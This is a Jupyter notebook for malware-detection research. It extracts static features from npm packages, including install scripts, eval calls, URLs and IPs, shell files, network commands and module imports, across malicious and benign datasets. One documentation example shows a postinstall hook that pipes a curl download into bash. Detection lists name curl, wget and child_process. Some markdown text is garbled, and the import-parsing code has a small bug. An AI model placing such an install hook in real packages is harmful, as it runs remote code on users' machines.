In [None]:
import os
import tarfile
import json
import re
import pandas as pd

### Function: `strip_comments`
This function remove both single-line and multi-line comments from a given string, such as source code or text files. It uses regular expressions to find and remove comments while keeping the rest of the content intact.d.

#### Parameters:
- **contents** (`str`): The input string, which can be code or text that might contain comments.

#### How It Works:
1. **Single-line comments**:
   - These are the comments that start with `//` and continue to the end of the line.
   - The function identifies them using the pattern `//.*\n`, which looks for everything after `//` until the end of the line.
   - Once identified, these comments are replaced with a simple nthene, so your line breaks stay intact.

2. **Multi-line comments**:
   - These comments are the ones wrapped in `/*` and `*/`, and they can span multiple lines.
   - The function uses `/\*.*?\*/` with some extra handling (thanks to `re.DOTALL`) to capture comments even if they stretch across several lines.
   - After identifying them, it simply removes them from the string, leaving the rest of your content clean aer single-line comment
'''


In [None]:
def strip_comments(contents):

    # Regular expression pattern to match single-line comments
    single_line_pattern = re.compile(r'//.*\n')
    contents = re.sub(single_line_pattern, '\n', contents)

    # Regular expression pattern to match multi-line comments
    multi_line_pattern = re.compile(r'/\*.*?\*/', re.DOTALL)
    contents = re.sub(multi_line_pattern, '', contents)

    return contents

### Function: `get_directories`

This function helps you retrieve all the directories inside a specified folder. It’s useful when you want to filter out files and just focus on the subdirectories within a given directory.

#### Parameters:
- **directory** (`str`): The path to the directory where you want to search for subdirectories.

#### How It Works:
1. **List all items**: The function starts by listing everything inside the specified directory (both files and folders).
2. **Filter directories**: It then filters this list to keep only the directories, ignoring any files or other items.
3. **Return**: Finally, it returns a list containing the names of all subdi

This is primarily used to iterate over each npm package in the folderlder1', 'folder2']th` contains:


In [None]:
def get_directories(directory):

    # Get a list of all items in the directory
    items = os.listdir(directory)

    # Filter the list to only include directories
    directories = [item for item in items if os.path.isdir(os.path.join(directory, item))]
    return directories

### Function: `check_post_install`

This function checks whether a specific `package.json` file inside a given folder contains any `preinstall`, `postinstall`, or `install` scripts. It's a helpful way to see if a package might run something during installation, which could be important when assessing package behavior.

#### Parameters:
- **folder** (`str`): The folder where you want to search for a `package.json` file.

#### How It Works:
1. **Search for `package.json`**: The function walks through all the directories and files inside the specified folder, looking for a `package.json` file.
2. **Read and parse `package.json`**: Once the `package.json` file is found, it tries to read and parse its contents as JSON.
3. **Check for scripts**: It checks if the `scripts` section of `package.json` contains any of the following:
   - `preinstall`
   - `postinstall`
   - `install`
4. **Return result**: If any of these scripts are present, the function returns `True`, indicating that one of these scripts exists. If no such scripts are found, or if there's an error, it returns `False`.

In [None]:
def check_post_install(folder):
    
    # Construct the path to the package.json file
    for root, dirs, files in os.walk(folder):
        for file in files:
            if file == "package.json":
                file_path = os.path.join(root, file)
                # Read the contents of the package.json file
                try:
                    with open(file_path, 'r', encoding='utf-8', errors='ignore') as file:
                        contents = json.load(file)
                    # Check if the package.json file includes a "scripts" section
                    if "scripts" in contents:
                        scripts = contents["scripts"]

                        # Check if the package.json file includes a pre, post, or install script
                        if "preinstall" in scripts or "postinstall" in scripts or "install" in scripts:
                            return True
                except Exception as e:
                    print(f"{file_path} - {e}")
    return False

### Function: `check_modules_used`

This function scans JavaScript files within a specified folder to find and list the modules that are being imported or required. It helps identify the external dependencies that a project or file uses.

#### Parameters:
- **folder** (`str`): The path to the folder where you want to search for JavaScript files.

#### How It Works:
1. **Initialize the module tracker**: The function starts by creating an empty set called `modules_used` to keep track of the modules it finds.
   
2. **Loop through all files**: It recursively walks through the folder, examining all files. If a file ends with `.js`, it’s considered a JavaScript file, and its contents are processed.
   
3. **Remove comments**: Before analyzing the file's contents, it strips out comments using the `strip_comments` function to avoid parsing modules mentioned in comments.
   
4. **Identify modules**: It looks for two types of imports:
   - **CommonJS imports**: These are found using `require()` calls, typical in Node.js.
   - **ECMAScript module imports**: These are found using the `import` keyword.
   
   Both patterns are captured using regular expressions, and any modules found are added to the `modules_used` set.
   
5. **Return the result**: After scanning all the files, the function returns a set of all the unique modules that were imported across all JavaScript files in the folder.

#### Example:

Suppose the folder contains a JavaScript file like this:

```javascript
// A sample JavaScript file
const fs = require('fs');
import axios from 'axios';
```
Running check_modules_used("/path/to/folder") would return a set like this:

```python
{'fs', 'axios'}
```

In [None]:
def check_modules_used(folder):
    # Keep track of the modules used in each file
    modules_used = set()
    # Loop through each file in the folder
    for root, dirs, files in os.walk(folder):
        for file in files:
            if file.endswith(".js"):
                file_path = os.path.join(root, file)
                with open(file_path, "r", encoding='utf-8', errors='ignore') as file:
                    contents = file.read()
                    contents = strip_comments(contents)
                    
                    import_common = re.compile(r"require\(['|\"](.*?)['|\"]\)")
                    import_ecma = re.compile("import [a-zA-Z0-9_]+ from ['\"][a-zA-Z0-9_./]+['\"]")
                    common = import_common.findall(contents)
                    ecma = import_ecma.findall(contents)
                    common = set(common)
                    ecma = set(common)
                    modules_used = modules_used.union(ecma)
                    modules_used = modules_used.union(common)

    return modules_used

### Function: `check_eval_usage`

This function scans all JavaScript files within a specified folder to check if any of them use the potentially unsafe `eval()` function. The `eval()` function can execute arbitrary code.

#### Parameters:
- **folder** (`str`): The path to the folder where you want to search for JavaScript files.

#### How It Works:
1. **Search through all files**: The function walks through the folder and all its subdirectories, examining each file.
   
2. **Target JavaScript files**: It only checks files with the `.js` extension, which are JavaScript files.

3. **Remove comments**: Before analyzing the content, it uses the `strip_comments` function to remove comments, ensuring that `eval()` mentioned in comments is ignored.

4. **Check for `eval()`**: The function searches for any occurrence of the `eval(` keyword in the file content. If it finds it, it immediately returns `True`, indicating that `eval()` is used in that file.

5. **Return result**: If none of the files contain `eval()`, the function returns `False`.

In [None]:
def check_eval_usage(folder):
    for root, dirs, files in os.walk(folder):
        eval_found = False
        for file in files:
            if file.endswith(".js"):
                file_path = os.path.join(root, file)
                with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
                    contents = f.read()
                    contents = strip_comments(contents)
                    if "eval(" in contents:
                        return True
    return False

### Function: `search_url_and_ip_address`

This function scans JavaScript files in a given directory to detect any URLs or IP addresses. It uses regular expressions to identify patterns that match URLs and IPv4 addresses.

#### Parameters:
- **directory** (`str`): The path to the directory where you want to search for JavaScript files.

#### How It Works:
1. **Define the search pattern**: The function uses a regular expression to match both:
   - **URLs** (e.g., `http://example.com`, `https://site.com`, `ftp://fileserver.com`)
   - **IP addresses** in IPv4 format (e.g., `192.168.0.1`).
   
2. **Search through JavaScript files**: It walks through the specified directory and all its subdirectories, looking for `.js` files.

3. **Read and search the files**: For each JavaScript file, it reads the contents and searches for URLs or IP addresses using the defined pattern.

4. **Return result**: If any URLs or IP addresses are found in the file, the function returns `True`. If no such patterns are found, it returns `False`.

In [None]:
def search_url_and_ip_address(directory):
    # Create a regular expression pattern to match URLs and IP addresses
    pattern = re.compile(r'\b(?:(?:https?|ftp):\/\/[^\s/$.?#].[^\s]*)|(?:(?:\d{1,3}\.){3}\d{1,3}\b)')

    # Walk through the directory and search for JavaScript files
    for root, dirs, files in os.walk(directory):
        for file in files:
            if file.endswith(".js"):
                file_path = os.path.join(root, file)
                with open(file_path, "r", encoding='utf-8', errors='ignore') as f:
                    contents = f.read()

                    # Search for URLs and IP addresses in the file contents
                    findings = re.findall(pattern, contents)

                    # Print the results
                    if findings:
                        return True

### Function: `find_files`

This function scans through a directory to find any files that match a specific set of extensions, such as shell scripts (`.sh`, `.bash`, `.bat`, `.zsh`).

#### Parameters:
- **directory** (`str`): The path to the directory where you want to search for files.

#### How It Works:
1. **Define target extensions**: The function is set up to look for files with the following extensions:
   - `.sh` (Shell scripts)
   - `.bash` (Bash scripts)
   - `.bat` (Batch files for Windows)
   - `.zsh` (Zsh scripts)
   
2. **Walk through the directory**: The function walks through the specified directory and all its subdirectories, checking each file it encounters.

3. **Match extensions**: For each file, it checks if the filename ends with any of the extensions defined in the list. If a match is found, the function returns `True`, indicating that at least one matching file exists.

4. **Return result**: If no files with the target extensions are found, the function returns `False`.

In [None]:
def find_files(directory):
    extensions = [".sh", ".bash", ".bat", ".zsh"]
    for root, dirs, files in os.walk(directory):
        for file in files:
            for extension in extensions:
                if file.endswith(extension):
                    return True
    return False

### Function: `check_curl_used`

This function checks if any `package.json` files in a directory contain a reference to the commands `curl`, `wget`, or `ping` in their scripts.
#### Parameters:
- **directory** (`str`): The path to the directory where you want to search for `package.json` files.

#### How It Works:
1. **Search for `package.json` files**: The function walks through the specified directory and its subdirectories, looking for any `package.json` files.
   
2. **Read and parse `package.json`**: Once a `package.json` file is found, it attempts to read and parse the file's contents as JSON.

3. **Check for scripts**: It looks for a `scripts` section in the `package.json` file, which may include various lifecycle hooks like `preinstall`, `postinstall`, or `install`.

4. **Search for specific commands**: The function then checks if any of these lifecycle scripts use the following network-related commands:
   - `curl`
   - `wget`
   - `ping`

5. **Return result**: If any of these commands are found in the script section, the function returns `True`. If no such scripts or commands are found, it returns `False`. If an error occurs while reading the `package.json` file, it logs the error and moves on to the next file.

#### Example:

Consider the following `package.json`:

```json
{
  "name": "example-package",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl http://example.com/setup.sh | bash"
  }
}


In [None]:
def check_curl_used(directory):
    for root, dirs, files in os.walk(directory):
        for file in files:
            if file == "package.json":
                file_path = os.path.join(root, file)
                # Read the contents of the package.json file
                try:
                    with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
                        contents = json.load(f)
                    # Check if the package.json file includes a "scripts" section
                    if "scripts" in contents:
                        scripts = contents["scripts"]
                        for script_type in ["preinstall", "postinstall", "install"]:
                            if script_type in scripts:
                                for type in ["curl", "wget", "ping"]:
                                    if type in scripts[script_type]:
                                        return True
                except (json.JSONDecodeError, FileNotFoundError, IOError) as e:
                    print(f"Error reading {file_path}: {e}")
                    continue
    return False

### Function: `extract_features`

This function analyzes a directory of packages and extracts various features defined in the paper. It consolidates information such as module usage, the presence of certain scripts, and the use of external resources into a CSV file.

#### Parameters:
- **file_path** (`str`): The path to the directory containing the packages you want to analyze.
- **output** (`str`): The path where the results (in CSV format) should be saved.

#### How It Works:
1. **Get the list of directories**: The function first gathers a list of directories (representing packages) from the provided `file_path`. It skips unnecessary directories like `.ipynb_checkpoints`.

2. **Feature extraction for each package**: For each package, the function performs a series of checks:
   - **Scripts**: It checks if the package includes installation scripts such as `preinstall`, `postinstall`, or `install` by using the `check_post_install()` function.
   - **Modules used**: It identifies the modules used in the package’s JavaScript files via `check_modules_used()`.
   - **`eval()` usage**: It determines whether the `eval()` function is used using `check_eval_usage()`.
   - **URLs and IP addresses**: It searches for hardcoded URLs and IP addresses within the package using `search_url_and_ip_address()`.
   - **Bash files**: It checks if the package includes any shell or batch script files via `find_files()`.
   - **Network-related commands**: It checks for the presence of commands like `curl`, `wget`, or `ping` in the package’s lifecycle scripts using `check_curl_used()`.

3. **Track specific modules**: The function also tracks the usage of specific Node.js modules that may indicate external interaction or privilege usage, such as:
   - `fs`, `node-fetch`, `child_process`, `https`, `http`, `crypto`, `os`, `node-serialize`, `axios`, `querystring`, `dns`, `path`.

   It adds a boolean value for each module, indicating whether or not it is used by the package.

4. **Create and save the dataframe**:
   - The data is stored in a Pandas DataFrame, where each row corresponds to a package and each column represents a feature.
   - A combined column, `https_or_http`, is created to indicate if either the `https` or `http` module is used.
   - The resulting feature set is saved as a CSV file in the specified output directory.

In [None]:
def extract_features(file_path, output):
    target_package_datas = {}
    directories = get_directories(file_path)
    for package in directories:
        if package != ".ipynb_checkpoints":
            target_package_datas[package] = {"package_name": package}
            
    for directory in directories:
        if directory != ".ipynb_checkpoints":
            package_path = os.path.join(file_path, directory)
            package_path = os.path.join(package_path, 'package/')
            target_package_datas[directory]["entry_through_script"] = check_post_install(package_path)
            target_package_datas[directory]["modules_used"] = check_modules_used(package_path)
            target_package_datas[directory]["eval"] = check_eval_usage(package_path)
            target_package_datas[directory]["has_ip_or_address"] = search_url_and_ip_address(package_path)
            target_package_datas[directory]["has_bash_file"] = find_files(package_path)
            target_package_datas[directory]["curl"] = check_curl_used(package_path)
                
                
    # Extract libraries            
    tracked_modules = ["fs", "node-fetch", "child_process", "https", "http", "crypto", "os", 
                   "node-serialize", "axios", "querystring", "dns", "path"]
    
    for package in target_package_datas:
        modules = target_package_datas[package]["modules_used"]
        for tracked_module in tracked_modules:
            if tracked_module in modules:
                target_package_datas[package][tracked_module] = True
            else:
                target_package_datas[package][tracked_module] = False
                
    dataframe = pd.DataFrame(target_package_datas.values())
    dataframe = dataframe.fillna(False)
    
    dataframe["https_or_http"] = dataframe["https"] | dataframe["http"]
    dataframe.drop("https", inplace=True, axis=1)
    dataframe.drop("http", inplace=True, axis=1)
    
    dataframe.to_csv(output + "/feature.csv", index=False)

### Extract Backstabbers Features

In [None]:
source_folder_path = "./Packages/Malware Backstabbers/npm_extracted"
result_destination = "./Packages/Malware Backstabbers"
extract_features(source_folder_path, result_destination)

### Extract MalOSS Features

In [None]:
source_folder_path = "./Packages/Malware MalOSS/npmjs-samples_extracted"
result_destination = "./Packages/Malware MalOSS"
extract_features(source_folder_path, result_destination)

### Extract Collected Own

In [None]:
source_folder_path = "./Packages/Malware Own/npm_extracted2"
result_destination = "./Packages/Malware Own"
extract_features(source_folder_path, result_destination)

### Extract Benign Target

In [None]:
source_folder_path = "./Packages/Benign Packages/Target Packages/packages_extracted"
result_destination = "./Packages/Benign Packages/Target Packages"
extract_features(source_folder_path, result_destination)

### Extract Benign Popular

In [None]:
source_folder_path = "./Packages/Benign Packages/Most Downloaded/packages_extracted"
result_destination = "./Packages/Benign Packages/Most Downloaded"
extract_features(source_folder_path, result_destination)